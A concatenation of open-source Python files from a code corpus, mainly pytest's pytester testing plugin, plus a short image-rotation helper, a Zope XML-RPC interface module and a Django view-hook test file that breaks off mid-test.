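def _demo_pil_angle(rotation):
    return int(rotation[1:]) if '-' in rotation else 360 - int(rotation)
assert _demo_pil_angle('90') == 270
assert _demo_pil_angle('-45') == 45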
| knoopr/ShotForTheHeart | ShotForTheHeart/models/ImageProcessor.py | Python | gpl-2.0 | 1,458 |
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""XML-RPC Publisher Interfaces
$Id: xmlrpc.py 27316 2004-08-27 23:11:03Z jim $
"""
from zope.component.interfaces import IView
from zope.component.interfaces import IPresentation
class IXMLRPCPresentation(IPresentation):
"""XML-RPC presentation
"""
class IXMLRPCView(IXMLRPCPresentation, IView):
"""XMLRPC View"""
| Donkyhotay/MoonPy | zope/app/publisher/interfaces/xmlrpc.py | Python | gpl-3.0 | 973 |
""" (disabled by default) support for testing pytest and pytest plugins. """
import gc
import sys
import traceback
import os
import codecs
import re
import time
import platform
from fnmatch import fnmatch
import subprocess
import py
import pytest
from py.builtin import print_
from _pytest.main import Session, EXIT_OK
def pytest_addoption(parser):
# group = parser.getgroup("pytester", "pytester (self-tests) options")
parser.addoption('--lsof',
action="store_true", dest="lsof", default=False,
help=("run FD checks if lsof is available"))
parser.addoption('--runpytest', default="inprocess", dest="runpytest",
choices=("inprocess", "subprocess", ),
help=("run pytest sub runs in tests using an 'inprocess' "
"or 'subprocess' (python -m main) method"))
def pytest_configure(config):
# This might be called multiple times. Only take the first.
global _pytest_fullpath
try:
_pytest_fullpath
except NameError:
_pytest_fullpath = os.path.abspath(pytest.__file__.rstrip("oc"))
_pytest_fullpath = _pytest_fullpath.replace("$py.class", ".py")
if config.getvalue("lsof"):
checker = LsofFdLeakChecker()
if checker.matching_platform():
config.pluginmanager.register(checker)
class LsofFdLeakChecker(object):
def get_open_files(self):
out = self._exec_lsof()
open_files = self._parse_lsof_output(out)
return open_files
def _exec_lsof(self):
pid = os.getpid()
return py.process.cmdexec("lsof -Ffn0 -p %d" % pid)
def _parse_lsof_output(self, out):
def isopen(line):
return line.startswith('f') and ("deleted" not in line and
'mem' not in line and "txt" not in line and 'cwd' not in line)
open_files = []
for line in out.split("\n"):
if isopen(line):
fields = line.split('\0')
fd = fields[0][1:]
filename = fields[1][1:]
if filename.startswith('/'):
open_files.append((fd, filename))
return open_files
def matching_platform(self):
try:
py.process.cmdexec("lsof -v")
except (py.process.cmdexec.Error, UnicodeDecodeError):
# cmdexec may raise UnicodeDecodeError on Windows systems
# with locale other than english:
# https://bitbucket.org/pytest-dev/py/issues/66
return False
else:
return True
@pytest.hookimpl(hookwrapper=True, tryfirst=True)
def pytest_runtest_item(self, item):
lines1 = self.get_open_files()
yield
if hasattr(sys, "pypy_version_info"):
gc.collect()
lines2 = self.get_open_files()
new_fds = set([t[0] for t in lines2]) - set([t[0] for t in lines1])
leaked_files = [t for t in lines2 if t[0] in new_fds]
if leaked_files:
error = []
error.append("***** %s FD leakage detected" % len(leaked_files))
error.extend([str(f) for f in leaked_files])
error.append("*** Before:")
error.extend([str(f) for f in lines1])
error.append("*** After:")
error.extend([str(f) for f in lines2])
error.append(error[0])
error.append("*** function %s:%s: %s " % item.location)
pytest.fail("\n".join(error), pytrace=False)
# XXX copied from execnet's conftest.py - needs to be merged
winpymap = {
'python2.7': r'C:\Python27\python.exe',
'python2.6': r'C:\Python26\python.exe',
'python3.1': r'C:\Python31\python.exe',
'python3.2': r'C:\Python32\python.exe',
'python3.3': r'C:\Python33\python.exe',
'python3.4': r'C:\Python34\python.exe',
'python3.5': r'C:\Python35\python.exe',
}
def getexecutable(name, cache={}):
try:
return cache[name]
except KeyError:
executable = py.path.local.sysfind(name)
if executable:
if name == "jython":
import subprocess
popen = subprocess.Popen([str(executable), "--version"],
universal_newlines=True, stderr=subprocess.PIPE)
out, err = popen.communicate()
if not err or "2.5" not in err:
executable = None
if "2.5.2" in err:
executable = None # http://bugs.jython.org/issue1790
cache[name] = executable
return executable
@pytest.fixture(params=['python2.6', 'python2.7', 'python3.3', "python3.4",
'pypy', 'pypy3'])
def anypython(request):
name = request.param
executable = getexecutable(name)
if executable is None:
if sys.platform == "win32":
executable = winpymap.get(name, None)
if executable:
executable = py.path.local(executable)
if executable.check():
return executable
pytest.skip("no suitable %s found" % (name,))
return executable
# used at least by pytest-xdist plugin
@pytest.fixture
def _pytest(request):
""" Return a helper which offers a gethookrecorder(hook)
method which returns a HookRecorder instance which helps
to make assertions about called hooks.
"""
return PytestArg(request)
class PytestArg:
def __init__(self, request):
self.request = request
def gethookrecorder(self, hook):
hookrecorder = HookRecorder(hook._pm)
self.request.addfinalizer(hookrecorder.finish_recording)
return hookrecorder
def get_public_names(l):
"""Only return names from iterator l without a leading underscore."""
return [x for x in l if x[0] != "_"]
class ParsedCall:
def __init__(self, name, kwargs):
self.__dict__.update(kwargs)
self._name = name
def __repr__(self):
d = self.__dict__.copy()
del d['_name']
return "<ParsedCall %r(**%r)>" %(self._name, d)
class HookRecorder:
"""Record all hooks called in a plugin manager.
This wraps all the hook calls in the plugin manager, recording
each call before propagating the normal calls.
"""
def __init__(self, pluginmanager):
self._pluginmanager = pluginmanager
self.calls = []
def before(hook_name, hook_impls, kwargs):
self.calls.append(ParsedCall(hook_name, kwargs))
def after(outcome, hook_name, hook_impls, kwargs):
pass
self._undo_wrapping = pluginmanager.add_hookcall_monitoring(before, after)
def finish_recording(self):
self._undo_wrapping()
def getcalls(self, names):
if isinstance(names, str):
names = names.split()
return [call for call in self.calls if call._name in names]
def assert_contains(self, entries):
__tracebackhide__ = True
i = 0
entries = list(entries)
backlocals = sys._getframe(1).f_locals
while entries:
name, check = entries.pop(0)
for ind, call in enumerate(self.calls[i:]):
if call._name == name:
print_("NAMEMATCH", name, call)
if eval(check, backlocals, call.__dict__):
print_("CHECKERMATCH", repr(check), "->", call)
else:
print_("NOCHECKERMATCH", repr(check), "-", call)
continue
i += ind + 1
break
print_("NONAMEMATCH", name, "with", call)
else:
pytest.fail("could not find %r check %r" % (name, check))
def popcall(self, name):
__tracebackhide__ = True
for i, call in enumerate(self.calls):
if call._name == name:
del self.calls[i]
return call
lines = ["could not find call %r, in:" % (name,)]
lines.extend([" %s" % str(x) for x in self.calls])
pytest.fail("\n".join(lines))
def getcall(self, name):
l = self.getcalls(name)
assert len(l) == 1, (name, l)
return l[0]
# functionality for test reports
def getreports(self,
names="pytest_runtest_logreport pytest_collectreport"):
return [x.report for x in self.getcalls(names)]
def matchreport(self, inamepart="",
names="pytest_runtest_logreport pytest_collectreport", when=None):
""" return a testreport whose dotted import path matches """
l = []
for rep in self.getreports(names=names):
try:
if not when and rep.when != "call" and rep.passed:
# setup/teardown passing reports - let's ignore those
continue
except AttributeError:
pass
if when and getattr(rep, 'when', None) != when:
continue
if not inamepart or inamepart in rep.nodeid.split("::"):
l.append(rep)
if not l:
raise ValueError("could not find test report matching %r: "
"no test reports at all!" % (inamepart,))
if len(l) > 1:
raise ValueError(
"found 2 or more testreports matching %r: %s" %(inamepart, l))
return l[0]
def getfailures(self,
names='pytest_runtest_logreport pytest_collectreport'):
return [rep for rep in self.getreports(names) if rep.failed]
def getfailedcollections(self):
return self.getfailures('pytest_collectreport')
def listoutcomes(self):
passed = []
skipped = []
failed = []
for rep in self.getreports(
"pytest_collectreport pytest_runtest_logreport"):
if rep.passed:
if getattr(rep, "when", None) == "call":
passed.append(rep)
elif rep.skipped:
skipped.append(rep)
elif rep.failed:
failed.append(rep)
return passed, skipped, failed
def countoutcomes(self):
return [len(x) for x in self.listoutcomes()]
def assertoutcome(self, passed=0, skipped=0, failed=0):
realpassed, realskipped, realfailed = self.listoutcomes()
assert passed == len(realpassed)
assert skipped == len(realskipped)
assert failed == len(realfailed)
def clear(self):
self.calls[:] = []
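# A minimal usage sketch (not part of the original module): a HookRecorder is
# normally obtained from Testdir.inline_run() further below; the test module
# content and the asserted outcomes here are illustrative assumptions only.
def example_hookrecorder_usage(testdir):
    testdir.makepyfile("""
        def test_ok():
            assert True
    """)
    reprec = testdir.inline_run("-q")
    # countoutcomes() returns the (passed, skipped, failed) report counts
    passed, skipped, failed = reprec.countoutcomes()
    assert (passed, skipped, failed) == (1, 0, 0)
    # individual recorded hook calls can also be inspected by hook name
    assert reprec.getcalls("pytest_collectstart")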
@pytest.fixture
def linecomp(request):
return LineComp()
def pytest_funcarg__LineMatcher(request):
return LineMatcher
@pytest.fixture
def testdir(request, tmpdir_factory):
return Testdir(request, tmpdir_factory)
rex_outcome = re.compile(r"(\d+) (\w+)")
class RunResult:
"""The result of running a command.
Attributes:
:ret: The return value.
:outlines: List of lines captured from stdout.
    :errlines: List of lines captured from stderr.
:stdout: :py:class:`LineMatcher` of stdout, use ``stdout.str()`` to
reconstruct stdout or the commonly used
``stdout.fnmatch_lines()`` method.
    :stderr: :py:class:`LineMatcher` of stderr.
:duration: Duration in seconds.
"""
def __init__(self, ret, outlines, errlines, duration):
self.ret = ret
self.outlines = outlines
self.errlines = errlines
self.stdout = LineMatcher(outlines)
self.stderr = LineMatcher(errlines)
self.duration = duration
def parseoutcomes(self):
""" Return a dictionary of outcomestring->num from parsing
the terminal output that the test process produced."""
for line in reversed(self.outlines):
if 'seconds' in line:
outcomes = rex_outcome.findall(line)
if outcomes:
d = {}
for num, cat in outcomes:
d[cat] = int(num)
return d
def assert_outcomes(self, passed=0, skipped=0, failed=0):
""" assert that the specified outcomes appear with the respective
numbers (0 means it didn't occur) in the text output from a test run."""
d = self.parseoutcomes()
assert passed == d.get("passed", 0)
assert skipped == d.get("skipped", 0)
assert failed == d.get("failed", 0)
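# A minimal usage sketch (not part of the original module): RunResult objects
# come from Testdir.runpytest() defined below; the file contents and expected
# outcomes here are illustrative assumptions only.
def example_runresult_usage(testdir):
    testdir.makepyfile("""
        def test_ok():
            assert True
        def test_broken():
            assert False
    """)
    result = testdir.runpytest()
    # assert_outcomes() parses the terminal summary line produced by the run
    result.assert_outcomes(passed=1, failed=1)
    # stdout is a LineMatcher, so glob-style matching can be used on output
    result.stdout.fnmatch_lines(["*1 failed*"])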
class Testdir:
"""Temporary test directory with tools to test/run py.test itself.
This is based on the ``tmpdir`` fixture but provides a number of
methods which aid with testing py.test itself. Unless
:py:meth:`chdir` is used all methods will use :py:attr:`tmpdir` as
current working directory.
Attributes:
:tmpdir: The :py:class:`py.path.local` instance of the temporary
directory.
:plugins: A list of plugins to use with :py:meth:`parseconfig` and
:py:meth:`runpytest`. Initially this is an empty list but
plugins can be added to the list. The type of items to add to
        the list depends on the method which uses them, so refer to them
for details.
"""
def __init__(self, request, tmpdir_factory):
self.request = request
# XXX remove duplication with tmpdir plugin
basetmp = tmpdir_factory.ensuretemp("testdir")
name = request.function.__name__
for i in range(100):
try:
tmpdir = basetmp.mkdir(name + str(i))
except py.error.EEXIST:
continue
break
self.tmpdir = tmpdir
self.plugins = []
self._savesyspath = (list(sys.path), list(sys.meta_path))
self._savemodulekeys = set(sys.modules)
self.chdir() # always chdir
self.request.addfinalizer(self.finalize)
method = self.request.config.getoption("--runpytest")
if method == "inprocess":
self._runpytest_method = self.runpytest_inprocess
elif method == "subprocess":
self._runpytest_method = self.runpytest_subprocess
def __repr__(self):
return "<Testdir %r>" % (self.tmpdir,)
def finalize(self):
"""Clean up global state artifacts.
Some methods modify the global interpreter state and this
tries to clean this up. It does not remove the temporary
directory however so it can be looked at after the test run
has finished.
"""
sys.path[:], sys.meta_path[:] = self._savesyspath
if hasattr(self, '_olddir'):
self._olddir.chdir()
self.delete_loaded_modules()
def delete_loaded_modules(self):
"""Delete modules that have been loaded during a test.
This allows the interpreter to catch module changes in case
the module is re-imported.
"""
for name in set(sys.modules).difference(self._savemodulekeys):
# it seems zope.interfaces is keeping some state
# (used by twisted related tests)
if name != "zope.interface":
del sys.modules[name]
def make_hook_recorder(self, pluginmanager):
"""Create a new :py:class:`HookRecorder` for a PluginManager."""
assert not hasattr(pluginmanager, "reprec")
pluginmanager.reprec = reprec = HookRecorder(pluginmanager)
self.request.addfinalizer(reprec.finish_recording)
return reprec
def chdir(self):
"""Cd into the temporary directory.
This is done automatically upon instantiation.
"""
old = self.tmpdir.chdir()
if not hasattr(self, '_olddir'):
self._olddir = old
def _makefile(self, ext, args, kwargs):
items = list(kwargs.items())
if args:
source = py.builtin._totext("\n").join(
map(py.builtin._totext, args)) + py.builtin._totext("\n")
basename = self.request.function.__name__
items.insert(0, (basename, source))
ret = None
for name, value in items:
p = self.tmpdir.join(name).new(ext=ext)
source = py.code.Source(value)
def my_totext(s, encoding="utf-8"):
if py.builtin._isbytes(s):
s = py.builtin._totext(s, encoding=encoding)
return s
source_unicode = "\n".join([my_totext(line) for line in source.lines])
source = py.builtin._totext(source_unicode)
content = source.strip().encode("utf-8") # + "\n"
#content = content.rstrip() + "\n"
p.write(content, "wb")
if ret is None:
ret = p
return ret
def makefile(self, ext, *args, **kwargs):
"""Create a new file in the testdir.
ext: The extension the file should use, including the dot.
E.g. ".py".
args: All args will be treated as strings and joined using
newlines. The result will be written as contents to the
file. The name of the file will be based on the test
function requesting this fixture.
E.g. "testdir.makefile('.txt', 'line1', 'line2')"
kwargs: Each keyword is the name of a file, while the value of
it will be written as contents of the file.
E.g. "testdir.makefile('.ini', pytest='[pytest]\naddopts=-rs\n')"
"""
return self._makefile(ext, args, kwargs)
def makeconftest(self, source):
"""Write a contest.py file with 'source' as contents."""
return self.makepyfile(conftest=source)
def makeini(self, source):
"""Write a tox.ini file with 'source' as contents."""
return self.makefile('.ini', tox=source)
def getinicfg(self, source):
"""Return the pytest section from the tox.ini config file."""
p = self.makeini(source)
return py.iniconfig.IniConfig(p)['pytest']
def makepyfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .py extension."""
return self._makefile('.py', args, kwargs)
def maketxtfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .txt extension."""
return self._makefile('.txt', args, kwargs)
def syspathinsert(self, path=None):
"""Prepend a directory to sys.path, defaults to :py:attr:`tmpdir`.
This is undone automatically after the test.
"""
if path is None:
path = self.tmpdir
sys.path.insert(0, str(path))
def mkdir(self, name):
"""Create a new (sub)directory."""
return self.tmpdir.mkdir(name)
def mkpydir(self, name):
"""Create a new python package.
        This creates a (sub)directory with an empty ``__init__.py``
        file so that it is recognised as a python package.
"""
p = self.mkdir(name)
p.ensure("__init__.py")
return p
Session = Session
def getnode(self, config, arg):
"""Return the collection node of a file.
:param config: :py:class:`_pytest.config.Config` instance, see
:py:meth:`parseconfig` and :py:meth:`parseconfigure` to
create the configuration.
:param arg: A :py:class:`py.path.local` instance of the file.
"""
session = Session(config)
assert '::' not in str(arg)
p = py.path.local(arg)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([str(p)], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def getpathnode(self, path):
"""Return the collection node of a file.
This is like :py:meth:`getnode` but uses
:py:meth:`parseconfigure` to create the (configured) py.test
Config instance.
:param path: A :py:class:`py.path.local` instance of the file.
"""
config = self.parseconfigure(path)
session = Session(config)
x = session.fspath.bestrelpath(path)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([x], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def genitems(self, colitems):
"""Generate all test items from a collection node.
This recurses into the collection node and returns a list of
all the test items contained within.
"""
session = colitems[0].session
result = []
for colitem in colitems:
result.extend(session.genitems(colitem))
return result
def runitem(self, source):
"""Run the "test_func" Item.
The calling test instance (the class which contains the test
method) must provide a ``.getrunner()`` method which should
return a runner which can run the test protocol for a single
item, like e.g. :py:func:`_pytest.runner.runtestprotocol`.
"""
# used from runner functional tests
item = self.getitem(source)
# the test class where we are called from wants to provide the runner
testclassinstance = self.request.instance
runner = testclassinstance.getrunner()
return runner(item)
def inline_runsource(self, source, *cmdlineargs):
"""Run a test module in process using ``pytest.main()``.
This run writes "source" into a temporary file and runs
``pytest.main()`` on it, returning a :py:class:`HookRecorder`
instance for the result.
:param source: The source code of the test module.
:param cmdlineargs: Any extra command line arguments to use.
:return: :py:class:`HookRecorder` instance of the result.
"""
p = self.makepyfile(source)
l = list(cmdlineargs) + [p]
return self.inline_run(*l)
def inline_genitems(self, *args):
"""Run ``pytest.main(['--collectonly'])`` in-process.
        Returns a tuple of the collected items and a
:py:class:`HookRecorder` instance.
This runs the :py:func:`pytest.main` function to run all of
py.test inside the test process itself like
:py:meth:`inline_run`. However the return value is a tuple of
the collection items and a :py:class:`HookRecorder` instance.
"""
rec = self.inline_run("--collect-only", *args)
items = [x.item for x in rec.getcalls("pytest_itemcollected")]
return items, rec
def inline_run(self, *args, **kwargs):
"""Run ``pytest.main()`` in-process, returning a HookRecorder.
This runs the :py:func:`pytest.main` function to run all of
py.test inside the test process itself. This means it can
return a :py:class:`HookRecorder` instance which gives more
        detailed results from the run than can be done by matching
stdout/stderr from :py:meth:`runpytest`.
:param args: Any command line arguments to pass to
:py:func:`pytest.main`.
:param plugin: (keyword-only) Extra plugin instances the
``pytest.main()`` instance should use.
:return: A :py:class:`HookRecorder` instance.
"""
rec = []
class Collect:
def pytest_configure(x, config):
rec.append(self.make_hook_recorder(config.pluginmanager))
plugins = kwargs.get("plugins") or []
plugins.append(Collect())
ret = pytest.main(list(args), plugins=plugins)
self.delete_loaded_modules()
if len(rec) == 1:
reprec = rec.pop()
else:
class reprec:
pass
reprec.ret = ret
# typically we reraise keyboard interrupts from the child run
# because it's our user requesting interruption of the testing
if ret == 2 and not kwargs.get("no_reraise_ctrlc"):
calls = reprec.getcalls("pytest_keyboard_interrupt")
if calls and calls[-1].excinfo.type == KeyboardInterrupt:
raise KeyboardInterrupt()
return reprec
def runpytest_inprocess(self, *args, **kwargs):
""" Return result of running pytest in-process, providing a similar
interface to what self.runpytest() provides. """
if kwargs.get("syspathinsert"):
self.syspathinsert()
now = time.time()
capture = py.io.StdCapture()
try:
try:
reprec = self.inline_run(*args, **kwargs)
except SystemExit as e:
class reprec:
ret = e.args[0]
except Exception:
traceback.print_exc()
class reprec:
ret = 3
finally:
out, err = capture.reset()
sys.stdout.write(out)
sys.stderr.write(err)
res = RunResult(reprec.ret,
out.split("\n"), err.split("\n"),
time.time()-now)
res.reprec = reprec
return res
def runpytest(self, *args, **kwargs):
""" Run pytest inline or in a subprocess, depending on the command line
option "--runpytest" and return a :py:class:`RunResult`.
"""
args = self._ensure_basetemp(args)
return self._runpytest_method(*args, **kwargs)
def _ensure_basetemp(self, args):
args = [str(x) for x in args]
for x in args:
if str(x).startswith('--basetemp'):
#print ("basedtemp exists: %s" %(args,))
break
else:
args.append("--basetemp=%s" % self.tmpdir.dirpath('basetemp'))
#print ("added basetemp: %s" %(args,))
return args
def parseconfig(self, *args):
"""Return a new py.test Config instance from given commandline args.
This invokes the py.test bootstrapping code in _pytest.config
to create a new :py:class:`_pytest.core.PluginManager` and
call the pytest_cmdline_parse hook to create new
:py:class:`_pytest.config.Config` instance.
If :py:attr:`plugins` has been populated they should be plugin
modules which will be registered with the PluginManager.
"""
args = self._ensure_basetemp(args)
import _pytest.config
config = _pytest.config._prepareconfig(args, self.plugins)
# we don't know what the test will do with this half-setup config
# object and thus we make sure it gets unconfigured properly in any
# case (otherwise capturing could still be active, for example)
self.request.addfinalizer(config._ensure_unconfigure)
return config
def parseconfigure(self, *args):
"""Return a new py.test configured Config instance.
This returns a new :py:class:`_pytest.config.Config` instance
like :py:meth:`parseconfig`, but also calls the
pytest_configure hook.
"""
config = self.parseconfig(*args)
config._do_configure()
self.request.addfinalizer(config._ensure_unconfigure)
return config
def getitem(self, source, funcname="test_func"):
"""Return the test item for a test function.
This writes the source to a python file and runs py.test's
collection on the resulting module, returning the test item
for the requested function name.
:param source: The module source.
:param funcname: The name of the test function for which the
Item must be returned.
"""
items = self.getitems(source)
for item in items:
if item.name == funcname:
return item
assert 0, "%r item not found in module:\n%s\nitems: %s" %(
funcname, source, items)
def getitems(self, source):
"""Return all test items collected from the module.
This writes the source to a python file and runs py.test's
collection on the resulting module, returning all test items
contained within.
"""
modcol = self.getmodulecol(source)
return self.genitems([modcol])
def getmodulecol(self, source, configargs=(), withinit=False):
"""Return the module collection node for ``source``.
This writes ``source`` to a file using :py:meth:`makepyfile`
and then runs the py.test collection on it, returning the
collection node for the test module.
:param source: The source code of the module to collect.
:param configargs: Any extra arguments to pass to
:py:meth:`parseconfigure`.
:param withinit: Whether to also write a ``__init__.py`` file
            to the temporary directory to ensure it is a package.
"""
kw = {self.request.function.__name__: py.code.Source(source).strip()}
path = self.makepyfile(**kw)
if withinit:
self.makepyfile(__init__ = "#")
self.config = config = self.parseconfigure(path, *configargs)
node = self.getnode(config, path)
return node
def collect_by_name(self, modcol, name):
"""Return the collection node for name from the module collection.
This will search a module collection node for a collection
node matching the given name.
:param modcol: A module collection node, see
:py:meth:`getmodulecol`.
:param name: The name of the node to return.
"""
for colitem in modcol._memocollect():
if colitem.name == name:
return colitem
def popen(self, cmdargs, stdout, stderr, **kw):
"""Invoke subprocess.Popen.
This calls subprocess.Popen making sure the current working
directory is the PYTHONPATH.
You probably want to use :py:meth:`run` instead.
"""
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(filter(None, [
str(os.getcwd()), env.get('PYTHONPATH', '')]))
kw['env'] = env
return subprocess.Popen(cmdargs,
stdout=stdout, stderr=stderr, **kw)
def run(self, *cmdargs):
"""Run a command with arguments.
Run a process using subprocess.Popen saving the stdout and
stderr.
Returns a :py:class:`RunResult`.
"""
return self._run(*cmdargs)
def _run(self, *cmdargs):
cmdargs = [str(x) for x in cmdargs]
p1 = self.tmpdir.join("stdout")
p2 = self.tmpdir.join("stderr")
print_("running:", ' '.join(cmdargs))
print_(" in:", str(py.path.local()))
f1 = codecs.open(str(p1), "w", encoding="utf8")
f2 = codecs.open(str(p2), "w", encoding="utf8")
try:
now = time.time()
popen = self.popen(cmdargs, stdout=f1, stderr=f2,
close_fds=(sys.platform != "win32"))
ret = popen.wait()
finally:
f1.close()
f2.close()
f1 = codecs.open(str(p1), "r", encoding="utf8")
f2 = codecs.open(str(p2), "r", encoding="utf8")
try:
out = f1.read().splitlines()
err = f2.read().splitlines()
finally:
f1.close()
f2.close()
self._dump_lines(out, sys.stdout)
self._dump_lines(err, sys.stderr)
return RunResult(ret, out, err, time.time()-now)
def _dump_lines(self, lines, fp):
try:
for line in lines:
py.builtin.print_(line, file=fp)
except UnicodeEncodeError:
print("couldn't print to %s because of encoding" % (fp,))
def _getpytestargs(self):
# we cannot use "(sys.executable,script)"
# because on windows the script is e.g. a py.test.exe
return (sys.executable, _pytest_fullpath,) # noqa
def runpython(self, script):
"""Run a python script using sys.executable as interpreter.
Returns a :py:class:`RunResult`.
"""
return self.run(sys.executable, script)
def runpython_c(self, command):
"""Run python -c "command", return a :py:class:`RunResult`."""
return self.run(sys.executable, "-c", command)
def runpytest_subprocess(self, *args, **kwargs):
"""Run py.test as a subprocess with given arguments.
        Any plugins added to the :py:attr:`plugins` list will be added
        using the ``-p`` command line option.  Additionally
        ``--basetemp`` is used to put any temporary files and directories
        in a numbered directory prefixed with "runpytest-" so they do
        not conflict with the normal numbered pytest location for
temporary files and directories.
Returns a :py:class:`RunResult`.
"""
p = py.path.local.make_numbered_dir(prefix="runpytest-",
keep=None, rootdir=self.tmpdir)
args = ('--basetemp=%s' % p, ) + args
#for x in args:
# if '--confcutdir' in str(x):
# break
#else:
# pass
# args = ('--confcutdir=.',) + args
plugins = [x for x in self.plugins if isinstance(x, str)]
if plugins:
args = ('-p', plugins[0]) + args
args = self._getpytestargs() + args
return self.run(*args)
def spawn_pytest(self, string, expect_timeout=10.0):
"""Run py.test using pexpect.
This makes sure to use the right py.test and sets up the
temporary directory locations.
The pexpect child is returned.
"""
basetemp = self.tmpdir.mkdir("pexpect")
invoke = " ".join(map(str, self._getpytestargs()))
cmd = "%s --basetemp=%s %s" % (invoke, basetemp, string)
return self.spawn(cmd, expect_timeout=expect_timeout)
def spawn(self, cmd, expect_timeout=10.0):
"""Run a command using pexpect.
The pexpect child is returned.
"""
pexpect = pytest.importorskip("pexpect", "3.0")
if hasattr(sys, 'pypy_version_info') and '64' in platform.machine():
pytest.skip("pypy-64 bit not supported")
if sys.platform == "darwin":
pytest.xfail("pexpect does not work reliably on darwin?!")
if sys.platform.startswith("freebsd"):
pytest.xfail("pexpect does not work reliably on freebsd")
logfile = self.tmpdir.join("spawn.out").open("wb")
child = pexpect.spawn(cmd, logfile=logfile)
self.request.addfinalizer(logfile.close)
child.timeout = expect_timeout
return child
def getdecoded(out):
try:
return out.decode("utf-8")
except UnicodeDecodeError:
return "INTERNAL not-utf8-decodeable, truncated string:\n%s" % (
py.io.saferepr(out),)
class LineComp:
def __init__(self):
self.stringio = py.io.TextIO()
def assert_contains_lines(self, lines2):
""" assert that lines2 are contained (linearly) in lines1.
return a list of extralines found.
"""
__tracebackhide__ = True
val = self.stringio.getvalue()
self.stringio.truncate(0)
self.stringio.seek(0)
lines1 = val.split("\n")
return LineMatcher(lines1).fnmatch_lines(lines2)
class LineMatcher:
"""Flexible matching of text.
This is a convenience class to test large texts like the output of
commands.
The constructor takes a list of lines without their trailing
newlines, i.e. ``text.splitlines()``.
"""
def __init__(self, lines):
self.lines = lines
def str(self):
"""Return the entire original text."""
return "\n".join(self.lines)
def _getlines(self, lines2):
if isinstance(lines2, str):
lines2 = py.code.Source(lines2)
if isinstance(lines2, py.code.Source):
lines2 = lines2.strip().lines
return lines2
def fnmatch_lines_random(self, lines2):
"""Check lines exist in the output.
The argument is a list of lines which have to occur in the
        output, in any order. Each line can contain glob wildcards.
"""
lines2 = self._getlines(lines2)
for line in lines2:
for x in self.lines:
if line == x or fnmatch(x, line):
print_("matched: ", repr(line))
break
else:
raise ValueError("line %r not found in output" % line)
def get_lines_after(self, fnline):
"""Return all lines following the given line in the text.
The given line can contain glob wildcards.
"""
for i, line in enumerate(self.lines):
if fnline == line or fnmatch(line, fnline):
return self.lines[i+1:]
raise ValueError("line %r not found in output" % fnline)
def fnmatch_lines(self, lines2):
"""Search the text for matching lines.
The argument is a list of lines which have to match and can
        use glob wildcards. If they do not match, pytest.fail() is
called. The matches and non-matches are also printed on
stdout.
"""
def show(arg1, arg2):
py.builtin.print_(arg1, arg2, file=sys.stderr)
lines2 = self._getlines(lines2)
lines1 = self.lines[:]
nextline = None
extralines = []
__tracebackhide__ = True
for line in lines2:
nomatchprinted = False
while lines1:
nextline = lines1.pop(0)
if line == nextline:
show("exact match:", repr(line))
break
elif fnmatch(nextline, line):
show("fnmatch:", repr(line))
show(" with:", repr(nextline))
break
else:
if not nomatchprinted:
show("nomatch:", repr(line))
nomatchprinted = True
show(" and:", repr(nextline))
extralines.append(nextline)
else:
pytest.fail("remains unmatched: %r, see stderr" % (line,))
| Akasurde/pytest | _pytest/pytester.py | Python | mit | 38,056 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
try:
from unittest import mock
except ImportError:
import mock
from django.test import TestCase
from hooks.viewhook import HookBase, HookProxy, Hook
class HookBaseTest(TestCase):
def setUp(self):
pass
def test_instance(self):
hook = HookBase("request", "foo", extra="bar")
self.assertEqual(hook.request, "request")
self.assertEqual(hook.args, ("foo", ))
self.assertDictEqual(hook.kwargs, {'extra': "bar", })
self.assertDictEqual(hook.context, {})
def test_methods(self):
hook = HookBase("request")
self.assertIsNone(hook.dispatch("foo", extra="bar"))
self.assertIsNone(hook.get("foo", extra="bar"))
self.assertIsNone(hook.post("foo", extra="bar"))
self.assertTrue(hook.is_valid())
self.assertIsNone(hook.save("foo", extra="bar"))
def test_proxy_method(func_name):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
proxy = HookProxy([])
proxy._hooks = [hook_a, hook_b]
func = getattr(proxy, func_name)
func("foo", extra="bar")
mocked = getattr(hook_a, func_name)
mocked.assert_called_once_with("foo", extra="bar")
mocked = getattr(hook_b, func_name)
mocked.assert_called_once_with("foo", extra="bar")
class HookProxyTest(TestCase):
def setUp(self):
pass
def test_instance(self):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
proxy = HookProxy([hook_a, hook_b], "request", "foo", extra="bar")
hook_a.assert_called_once_with("request", "foo", extra="bar")
hook_b.assert_called_once_with("request", "foo", extra="bar")
def test_methods(self):
test_proxy_method("dispatch")
test_proxy_method("get")
test_proxy_method("post")
test_proxy_method("save")
self.assertRaises(AttributeError, test_proxy_method, "foo")
def test_is_valid(self):
hook_a = mock.MagicMock()
hook_b = mock.MagicMock()
hook_a.is_valid.return_value = True
hook_b.is_valid.return_value = True
proxy = HookProxy([])
proxy._hooks = [hook_a, hook_b]
self.assertTrue(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
hook_a.is_valid.return_value = False
hook_b.is_valid.return_value = True
hook_a.reset_mock()
hook_b.reset_mock()
self.assertFalse(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
hook_a.is_valid.return_value = True
hook_b.is_valid.return_value = False
hook_a.reset_mock()
hook_b.reset_mock()
self.assertFalse(proxy.is_valid())
hook_a.is_valid.assert_called_once_with()
hook_b.is_valid.assert_called_once_with()
hook_a.is_valid.return_value = False
hook_b.is_valid.return_value = False
